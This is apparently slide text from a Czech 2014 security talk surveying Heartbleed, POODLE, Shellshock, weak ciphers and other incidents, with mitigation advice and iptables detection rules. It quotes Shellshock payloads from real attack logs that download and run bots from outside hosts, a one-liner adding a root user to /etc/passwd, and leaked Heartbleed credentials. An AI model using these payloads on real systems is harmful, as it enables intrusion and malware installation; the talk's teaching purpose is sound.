NeBezpečnost 2014

NeBezpečnost 2014
Radoslav Bodó, Jakub Urbanec
HeartBleed
the best of OpenSSL
ever
Úterý 8. duben 2014:
5.30 twitter feed - SSL vuln, gaping hole, sploited
7.30 posílám mail
Objevila se chyba v OpenSSL. Je ve verzi 1.0.1, ale
doporučuji prohlédnout konfiguraci. Nevím, jestli se
někde v KLIENT vyskytuje OpenSSL s heartbeat extenzí.
Cože?
Chyba Heartbleed je závažná zranitelnost v populární
knihovně OpenSSL která útočníkovi umožní ukrást část
informací, které by normálně měla chránít před
nežádoucími zraky a měla by “zabezpečovat” internet.
Cože?
Jednoduše, umožní útočníkovi přečíst až 64K paměti ze
strany serveru. Útok nezanechává na serveru žádné
stopy (v základním nastavení). Útok je možné libovolně
opakovat a číst tak náhodně různé části paměti, kde se
můžou nacházet citlivá data -- SSL klíče, přihlašovací
údaje ...
Při hodnocení na stupnici 1 až 10 je HB číslo 11.
Cože?
Bug byl do knihovny zavlečen v Prosinci 2011 a byl v ní
přítomen od vydání verze 1.0.1 -- 14. března 2012.
Opraven byl 7. dubna 2014 ve verzi 1.0.1g
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
typ HB
Do payload načti délku dat (sizeof(pl)??)
pl je zbytek dat od klienta (klidně 1B)
do bufferu bp
vrzni payload bajtů dat z pl
ehmmmm, wait a minute...
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Here's what a small sample of such a login looked like using one of the PoCs:
---------------}]..Connection:
keep-alive..Cont
ent-Type: applic
ation/x-www-form
-urlencoded..Con
tent-Length: 96.
...username=john
niedoe123%40gmai
l.com&password=s
upersecret123&re
member=remember&
submit_form=Sign
+in..E5.....dJ..
----------------
Kdo je v pohodě
Ten, kdo patchuje sakra rychle
Open SSL 1.0.1g
Ten kdo patchuje sakra pomalu
Open SSL 0.9.8X, 1.0.0X
Jak na to
-DOPENSSL_NO_HEARTBEATS
# Log rules
iptables -t filter -A INPUT -p tcp --dport 443 -m u32 --u32 \
"52=0x18030000:0x1803FFFF" -j LOG --log-prefix "BLOCKED: HEARTBEAT"
# Block rules
iptables -t filter -A INPUT -p tcp --dport 443
"52=0x18030000:0x1803FFFF" -j DROP
-m u32 --u32 \
To ale vede k DoS! Používejte –limit
It appears to me that this rule assumes that TLS records align with TCP packet boundaries.
Attackers can circumvent it by manipulating said boundaries.
POODLE attacks on SSLv3
(14 Oct 2014)
SSLv3
(November 18, 1996)
SSL version 3.0, released in 1996, was a complete
redesign of the protocol produced by Paul
Kocher working with Netscape engineers Phil Karlton
and Alan Freier.
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
https://nakedsecurity.sophos.com/2014/10/16/poodle-attack-takes-bytes-out-of-your-data-heres-what-to-do/
utocnik musi byt velmi aktivni
drive by javascript and network sniffing (bgp hijack, router malware)
kliknuti do google doc udela cca 50 rekvestu, bezne z prohizecu tece kopec trafficu do tech cloudu, tam se nejaky
spravny milionek muze schovat ?
jde proste o to ze utok je aktualne prakticky mozny a z hlediska “crypto” je i ppst 1/256 dost!
asi zhruba vime kudy tece plyn (i kdyz i to byva predmetem sporu ;), kudy tecou ta interfernetova data je tak trochu
zbozne prani
TLSv1.0
(January 1999)
… as an upgrade of SSL v 3.0
TLS 1.0 does include a means by which a TLS
implementation can downgrade the connection to SSL
3.0, thus weakening security
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
TLSv1.1
(April 2006)
Significant differences in this version include:
Added protection against cipher-block chaining (CBC) attacks.
Change in handling of padding errors.
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
SSLv3
Sorry, ale je čas jít z domu,
klacku!
Padding Oracle On Downgraded Legacy
Encryption
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Co byste s tím dělali?
1. Zákazník má zranitelnou aplikaci
2. Nemůže okamžitě patchovat ZASE!
OpenSSL na svých serverch (protože
testovací kolečko)
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Co s tím dělat?
To je chyba
protokolu
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Co s tím dělat?
TLS offload server
Zakázat CBC-based šifry v konfiguraci SSL 3.0 – jen DO DODÁNÍ PATCHE
PSK-AES256-CBC-SHA
SSLv3 Kx=PSK
Au=PSK Enc=AES(256) Mac=SHA1
ECDHE-RSA-DES-CBC3-SHA SSLv3 Kx=ECDH
Au=RSA Enc=3DES(168) Mac=SHA1
ECDHE-ECDSA-DES-CBC3-SHA SSLv3 Kx=ECDH
Au=ECDSA Enc=3DES(168) Mac=SHA1
EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH
Au=RSA Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH
Au=DSS Enc=3DES(168) Mac=SHA1
ECDH-RSA-DES-CBC3-SHA SSLv3 Kx=ECDH/RSA Au=ECDH Enc=3DES(168) Mac=SHA1
ECDH-ECDSA-DES-CBC3-SHA SSLv3 Kx=ECDH/ECDSA Au=ECDH Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA
SSLv3 Kx=RSA
Au=RSA Enc=3DES(168) Mac=SHA1
PSK-AES128-CBC-SHA
SSLv3 Kx=PSK
Au=PSK Enc=AES(128) Mac=SHA1
PSK-3DES-EDE-CBC-SHA SSLv3 Kx=PSK
Au=PSK Enc=3DES(168) Mac=SHA1
KRB5-DES-CBC3-SHA
SSLv3 Kx=KRB5
Au=KRB5 Enc=3DES(168) Mac=SHA1
KRB5-DES-CBC3-MD5
SSLv3 Kx=KRB5
Au=KRB5 Enc=3DES(168) Mac=MD5
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Co takhle SSL v3.0 bez CBC
Nechat tohle?
ECDHE-RSA-AES256-SHA SSLv3 Kx=ECDH Au=RSA Enc=AES(256)
Mac=SHA1
ECDHE-ECDSA-AES256-SHA SSLv3 Kx=ECDH Au=ECDSA Enc=AES(256)
Mac=SHA1
DHE-RSA-AES256-SHA
SSLv3 Kx=DH
Au=RSA Enc=AES(256)
Mac=SHA1
DHE-DSS-AES256-SHA
SSLv3 Kx=DH
Au=DSS Enc=AES(256)
Mac=SHA1
DHE-RSA-CAMELLIA256-SHA SSLv3 Kx=DH
Au=RSA Enc=Camellia(256) Mac=SHA1
DHE-DSS-CAMELLIA256-SHA SSLv3 Kx=DH
Au=DSS Enc=Camellia(256) Mac=SHA1
ECDH-RSA-AES256-SHA SSLv3 Kx=ECDH/RSA Au=ECDH Enc=AES(256) Mac=SHA1
ECDH-ECDSA-AES256-SHA SSLv3 Kx=ECDH/ECDSA Au=ECDH Enc=AES(256)
Mac=SHA1
AES256-SHA
SSLv3 Kx=RSA
Au=RSA Enc=AES(256)
Mac=SHA1
CAMELLIA256-SHA
SSLv3 Kx=RSA
Au=RSA Enc=Camellia(256) Mac=SHA1
ECDHE-RSA-AES128-SHA SSLv3 Kx=ECDH Au=RSA Enc=AES(128)
Mac=SHA1
ECDHE-ECDSA-AES128-SHA SSLv3 Kx=ECDH Au=ECDSA Enc=AES(128) Mac=SHA1
DHE-RSA-AES128-SHA
SSLv3 Kx=DH
Au=RSA Enc=AES(128)
Mac=SHA1
DHE-DSS-AES128-SHA
SSLv3 Kx=DH
Au=DSS Enc=AES(128)
Mac=SHA1
DHE-RSA-CAMELLIA128-SHA SSLv3 Kx=DH
Au=RSA Enc=Camellia(128) Mac=SHA1
DHE-DSS-CAMELLIA128-SHA SSLv3 Kx=DH
Au=DSS Enc=Camellia(128) Mac=SHA1
ECDH-RSA-AES128-SHA SSLv3 Kx=ECDH/RSA Au=ECDH Enc=AES(128) Mac=SHA1
ECDH-ECDSA-AES128-SHA SSLv3 Kx=ECDH/ECDSA Au=ECDH Enc=AES(128)
Mac=SHA1
AES128-SHA
SSLv3 Kx=RSA
Au=RSA Enc=AES(128)
Mac=SHA1
CAMELLIA128-SHA
SSLv3 Kx=RSA
Au=RSA Enc=Camellia(128) Mac=SHA1
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Není to z bláta do louže?
ORLY?
Mac=SHA1
Mac=SHA1
Mac=SHA1
Mac=SHA1
Mac=SHA1
Mac=SHA1
Mac=SHA1
Mac=SHA1
Mac=SHA1
Mac=SHA1
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
https://malicioussha1.github.io/
Konec životního cyklu SHA1 se blíží ?
ENISA -- taháček
Zkratky 2014 s výhledem donazimy ...
Key lengths analysis
Last year, ENISA, which is referenced as a
consultative body in the European Commission's
data breach notification rules, released a
cryptographic guidelines report on securing
personal data online. The new reports made
available last week, "Algorithms, key size and
parameters" and "Study on cryptographic
protocols" build upon the 2013 study.
RSA - faktorizace, DLP - diskretni logaritmus -- to jsou ty slozite matematicke problemy na
kterych stoji asymetricka kryptografie
Co s tím dělá TLS v 1.x ?
14 x Mac=AEAD
10 x Mac=SHA256
4 x Mac=SHA384
Authenticated Encryption with Associated Data
(AEAD) is a class of block cipher modes which encrypt
(parts of) the message and authenticate the message
simultaneously
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Eeek ?
Konec životního cyklu SHA1 se blíží ?
●
pole dostupných kryptografických technologií se zmenšuje
○ -sha1, -sslv3
○ apple goto fail
○ http://www.gnutls.org/security.html#GNUTLS-SA-2014-2
○
je to takový stísněný pocit, ale ...
■
každy tedy má používat pouze AES a TLS (+-)
● nechtěl bych vidět tu paniku až padne AES
■
na druhou stranu přinese zjednodušení vyšší míru kontroly, potažmo
snad i bezpečnosti
■
… ale třeba čištěných implementací oblíbených knihoven (OpenSSL)
přibývá jako hub po dešti
● LibreSSL, BoringSSL
Šokantní bašovina
...interpretační skořepina
C++
(){:;};
Aby
váš
server
lépe
shell
Bash: Strike hard and violently, collide. To fiercely criticize or oppose.
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
• Specifikace procedury x
• Plus přidaná hodnota za };
• Při vyhodnocení proměnných prostředí (které mohou obsahovat i
specifikaci procedur) se kód za }; spustí…
P.S. shell interpret
!=
interpretační skořepina
… a s ním i třeba Apache?
OpenBSD httpd –chroot, +cgi-bin (non default ;-)
Std apache cgi-bin skripty- printenv, test-cgi
… a v /tmp máme prima data
… ale já nejsem server,
v klidu…
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18,
stripped
It appears to be a kernel exploit with a CnC component.
Nasbíráno za týden …
Jen z mého http serveru
Logy:
209.126.230.72 [25/Sep/2014:02:24:19] "GET / HTTP/1.0" 200 299 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.
com/2014/09/bash-shellshock-scan-of-internet.html)“
89.207.135.125 [25/Sep/2014:15:36:20] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 411 "-" "() { :;}; /bin/ping -c 1 198.101.206.138“
54.251.83.67 [27/Sep/2014:03:07:51 +0200] "GET / HTTP/1.1" 200 254 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname –a"
217.14.242.115 [28/Sep/2014:07:04:29 +0200] "GET / HTTP/1.0" 200 299 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.
us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"“
67.227.0.77 [29/Sep/2014:09:24:39 +0200] "GET / HTTP/1.0" 200 299 "-" "() { :;}; /bin/bash -c \"wget -P /var/tmp 174.143.240.43/.../x ;
perl /var/tmp/x\""
• Shell skripty
• PHP bot se dvěma perl skripty (worm)
• Poslední je obfuskovaný perl bot (base64)
• Argumenty – mail, mailflood, tcp/udp scan, portscan, irc flood apod.
Aby váš shell lépe šel … dopady
Bash: nevíme, co dál
Dopady dodnes netušíme
○
○
○
○
mail servery
DB servery
potenciál pro SQLi
Cokoliv co leze do shellu || pajpy
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Aby váš shell lépe šel … opravit?
Bash: víme, co dál, ale jen z legrace
Máte dhcp server?
dhcp-option-force=114,() { :; };
apt-get update&&apt-get –y upgrade||yum –y update;
Chcete ochránit cizí servery?
HTTP_USER_AGENT=() { :; };
apt-get update&&apt-get –y upgrade||yum –y update;
© Copyright 2014 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Zprávy
CVE-2014-6324 aka Windows Kerberos implementation elevation of privilege vulnerability
●
Krátká zajímavost, spojíme-li (ale opravdu véééélmi volně ;)
○
○
●
Hearthbleed -- klient říká “dej mi” a server dá
Poodle -- špatny návrh/implementace ověřovacích rutin
Dostaneme zajímavou zranitelnost v produktech MS, kdy služby užívající doménové ověření
umožní klientovi zvyšit na vyžádání jeho oprávnění až na úroveň doménového
administrátora ...
Karel: Ahoj, já sem Karel.
Kuba: Ahoj, Karle, já sem Kuba.
Karel: Kubo prosimtě, já bych se chtěl připojit na virtuální server X, jo a krom toho jsem
Administrátor.
Kuba: Jasný Karle, není problém.
UDP Flood 2014
Zase přišel do módy ?
Oblíbene téma pro pány ...
The Fappening - Cloudová pornografie na vzestupu
Zranitelnost v Aj-službách
▪ Staženo bylo poměrně velké množství
různých obrázků až s podivem kolik
tělové barvy se dokázalo v takovém
obláčku najít
Truecrypt gone ?
A co na to Jan Tleskač ?
•
V květnu byl jako mávnutím kouzelného proutku ukončen projekt TrueCrypt
•
•
•
binární blob pro Windows/Linux/MacOS
i přesto že byl velmi podezřelý, byl hojně používaný
A jak dnes šifrujete svoje soubory vy ?
SMLOUVA.EXE - triky z roku raz dva
Taková malá spamová kampaň a třeba zatím jenom pro Čechy ...
▪ Napaden byl velký kopec
počítačů, akorát nikdo z nás
neví, jak je ten kopec vysokej
…
▪ Podle mně to v klidu budou
deseti-tisíce v první vlně
SMLOUVA.EXE - triky z roku raz dva
Taková malá spamová kampaň a třeba zatím jenom pro Čechy ...
●
Vlny ale pokračují debt@, ruznajmena@, různe předměty zpráv, poměrně dobře vypadající zprávy
○ smlouva, exekuční příkaz, zásilka od České pošty, pohledávka na účtu, MMS spam, falešné
prodlužování domén, co dál???? … datové schránky ?
●
kolik hráčů a co dělají ?
○ keylogging
○ credential harvesting for spam
○ cryptolocker nebo nejakej jinej locker ???
Kdyz SSL, tak pro všechny 2015
Today (18.11.2014) EFF is pleased to announce Let’s Encrypt, a new certificate authority (CA) initiative that we have put
together with Mozilla, Cisco, Akamai, IdenTrust, and researchers at the University of Michigan that aims to clear the
remaining roadblocks to transition the Web from HTTP to HTTPS.
●
Par velkých hráčů se rozhodlo začít provozovat v browserech uznávanou zadarmovou certifikační
autoritu -- chtěli by zrušit HTTP a všude používat HTTPS
●
●
●
●
bude to fungovat ?
bude dost IP adres ? -- ono to není jenom o certifikátech (namebasedvirtualhosts, SNI, …)
budou tyto certifikáty alespoň jakkoliv zajišťovat autenticitu ? (počítáme, že půjde pouze o
domain/content validation)
nechci to vidět až se češi dozvědí, že je něco zadarmo .. bohajeho
Tor deanonymization ?
●
Záhadná síť jestě záhadnější než obvykle ...
○
RELAY_EARLY
■
○
Analýza Netflow na vhodných místech a aktivní generování statisticky měřitelných odchylek v
přenosech
■
○
http://www.robgjansen.com/publications/sniper-ndss2014.pdf
Operator of SilkRoad 2.0 website charged in Manhattan federal court
■
○
http://securityaffairs.co/wordpress/30202/hacking/tor-traffic-analysis-attack.html
The Sniper Attack: Anonymously Deanonymizing and Disabling the Tor Network
■
○
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack
http://www.fbi.gov/newyork/press-releases/2014/operator-of-silk-road-2.0-website-charged-in-manhattan-federal-court
Dynamicke přidávání čehokoliv/viru do stahovaných dat/EXE (asi nikoho nepřekvapuje)
■
http://securityaffairs.co/wordpress/29589/cyber-crime/tor-exit-node-serves-malware.html
Praktická ukázka ...
Dick Tionary attack
Prší
2014
2012
2011
2010
2009
2008
243
205
214
162
264
253
79
76
86
68
68
69
Gentoo Linux Security Advisories
http://www.gentoo.org/security/en/glsa/index.xml
188
149
47
42
151
191
FreeBSD Security Advisories
http://www.freebsd.org/security/advisories.html
http://www.vuxml.org/freebsd/
149
251
158
132
167
161
CVE Candidates
http://cve.mitre.org/data/downloads/allcans.txt
8813
6069
4637
4333
4037
6432
Debian Security Advisories
http://www.debian.org/security/2009/
Microsoft Security Bulletin
http://www.microsoft.com/technet/security/current.aspx
2013
(){ :;};echo
"bc::0:0:
Hovory z LAN :/root:
/bin/bash >> /etc/passwd"
bodik & Čuba++